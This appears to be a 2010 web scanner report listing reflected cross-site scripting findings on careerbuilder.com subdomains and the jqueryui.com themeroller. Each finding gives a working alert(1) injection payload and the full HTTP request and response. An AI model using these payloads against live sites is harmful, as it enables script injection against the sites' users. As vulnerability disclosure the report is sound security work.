HTTP/1.1 200 OK Cache-Control: private Content-Length: 196142 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=e3a92f7a94bb4aefad32a22492f2f8ec-343070882-wj-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6503492847FF777B22F8576D0825F22D3B746B718754B54EA145BAD3B556B5A7EA8F7DE56AA62C5B566; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:28:02 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:43:02 GMT; path=/ X-Powered-By: ASP.NET X-PBY: BEAR20 Date: Sun, 14 Nov 2010 22:28:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh3041b'-alert(1)-'6d3b4ce97bc&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 749c6"%20a%3db%20751bb406a83 was submitted in the lr parameter. This input was echoed as 749c6" a=b 751bb406a83 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ex.ic/Florida_Miami/?lr=cbcb_mh749c6"%20a%3db%20751bb406a83&SiteID=cbcb_mh038 HTTP/1.1 Host: executive.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 195292 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=47aedb72ac304fa681c636fd69677a9d-343070852-XA-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6500EA1D41B61C64B6248A474FC3460AF4AEC050CF26BFBC579150EA207841BA8141D97498AE19DB109; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:27:32 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:42:33 GMT; path=/ X-Powered-By: ASP.NET X-PBY: BEAR41 Date: Sun, 14 Nov 2010 22:27:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd998"%20a%3db%20b05fa222a32 was submitted in the lr parameter. This input was echoed as cd998" a=b b05fa222a32 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gv.ic/Florida_Miami/?lr=cbcb_mhcd998"%20a%3db%20b05fa222a32&SiteID=cbcb_mh093 HTTP/1.1 Host: gov.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 183263 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=ecdb0331cb464a329fd1c80ad18f7967-343070959-w2-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650CC4B7FEBB57BA953BF422DB350B4E9BA73F80F19EB0362A5B01665D8C3627263610414ED49AA948E; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:29:19 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:44:19 GMT; path=/ X-Powered-By: ASP.NET X-PBY: BEAR2 Date: Sun, 14 Nov 2010 22:29:19 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61ef3'-alert(1)-'1222dc2a568 was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gv.ic/Florida_Miami/?lr=cbcb_mh61ef3'-alert(1)-'1222dc2a568&SiteID=cbcb_mh093 HTTP/1.1 Host: gov.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 183635 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=fe5cf099e2404089ab2ae0bf03c8cc69-343070985-w2-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6504D3DF8B2F19A076E592FF6AA46ECF05B008D780A8FC101ADEA09DA48E869B6649FEEDA7F13873918; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:29:45 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:44:46 GMT; path=/ X-Powered-By: ASP.NET X-PBY: BEAR2 Date: Sun, 14 Nov 2010 22:29:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh61ef3'-alert(1)-'1222dc2a568&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a656a"%20a%3db%203feb96be110 was submitted in the lr parameter. This input was echoed as a656a" a=b 3feb96be110 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /hr.ic/Florida_Miami/?lr=cbcb_mha656a"%20a%3db%203feb96be110&SiteID=cbcb_mh041 HTTP/1.1 Host: human-resources.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 194193 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=1e5701970477412aa75465747cf51d58-343070973-VK-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650865DE06C3AE6A4BBB8F6A0661D0455222BAE02B5150F8E67A38F6CB311BAA009D670CCB1DAF5CA4A; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:29:33 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:44:33 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL32 Date: Sun, 14 Nov 2010 22:29:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ba05'-alert(1)-'20bdb4e6d83 was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hr.ic/Florida_Miami/?lr=cbcb_mh5ba05'-alert(1)-'20bdb4e6d83&SiteID=cbcb_mh041 HTTP/1.1 Host: human-resources.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 194902 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=7bfbfd0022de40daa96f627df37564bf-343070993-RM-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6501E658FA81FEF0DB60921B25D8E4F2FE04403B3C7B2678EDE05E651406E1D89EA5E4984F4B9384687; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:29:53 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:44:53 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL22 Date: Sun, 14 Nov 2010 22:29:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh5ba05'-alert(1)-'20bdb4e6d83&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54914"%20a%3db%2095f3352e48e was submitted in the lr parameter. This input was echoed as 54914" a=b 95f3352e48e in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /it.ic/Florida_Miami/?lr=cbcb_mh54914"%20a%3db%2095f3352e48e&SiteID=cbcb_mh042 HTTP/1.1 Host: information-technology.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 190767 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=1eebfb60fe96456d8a3b98a9516e4751-343070978-RB-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6508E9F867635F13D3D0437D5790B86ED02ADDD09ED97BAA2FC74B7E92B73F8C7F44E1FFD0AA13E1555; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:29:37 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:44:38 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL11 Date: Sun, 14 Nov 2010 22:29:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40fd5'-alert(1)-'67f3434df66 was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /it.ic/Florida_Miami/?lr=cbcb_mh40fd5'-alert(1)-'67f3434df66&SiteID=cbcb_mh042 HTTP/1.1 Host: information-technology.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 191425 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=78df5155179941aab241f0efdb48ee86-343070998-RN-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650E36B0C4DEFC08F5BFE7A35E645C2838A9BCADFD76C078D6DE946337E6A1CF3E4E66BD1632AD26272; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:29:57 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:44:57 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL23 Date: Sun, 14 Nov 2010 22:29:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh40fd5'-alert(1)-'67f3434df66&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a8fa"%20a%3db%2093e8de4ffcf was submitted in the lr parameter. This input was echoed as 5a8fa" a=b 93e8de4ffcf in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /?lr=cbcb_mhf48aa5a8fa"%20a%3db%2093e8de4ffcf HTTP/1.1 Host: jobs.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 214959 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=a65b5fb365ae44cc8b49eabc5ccc3421-343074892-VN-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC65071F320652C53B5FA10158B2D35DBDE6BFEC751AD5160D38F3BC3DA535E23566CDCE239E7AB373819; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 23:34:52 GMT; path=/; HttpOnly Set-Cookie: CB%5FSID=83c8a36c2e2640f4b9534cdd2b31d1d8-343074892-VN-4; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: CB%5FSID=7b43206340c54fa09d034e175604b78b-343074892-VN-4; domain=.careerbuilder.com; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: REBEL35 Date: Sun, 14 Nov 2010 23:34:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd3ae"><script>alert(1)</script>e4b0ad6907f was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffffbd3ae"><script>alert(1)</script>e4b0ad6907f&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:34 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 852bb"><script>alert(1)</script>5966d356e19 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff852bb"><script>alert(1)</script>5966d356e19&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:07 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe1fc"><script>alert(1)</script>492295ded91 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6fe1fc"><script>alert(1)</script>492295ded91&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:15 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69302"><script>alert(1)</script>d38504ae62d was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec69302"><script>alert(1)</script>d38504ae62d&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:51 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5f75"><script>alert(1)</script>80a5b434414 was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=ccccccd5f75"><script>alert(1)</script>80a5b434414&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:01 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7afeb"><script>alert(1)</script>e6e1ca26fde was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.
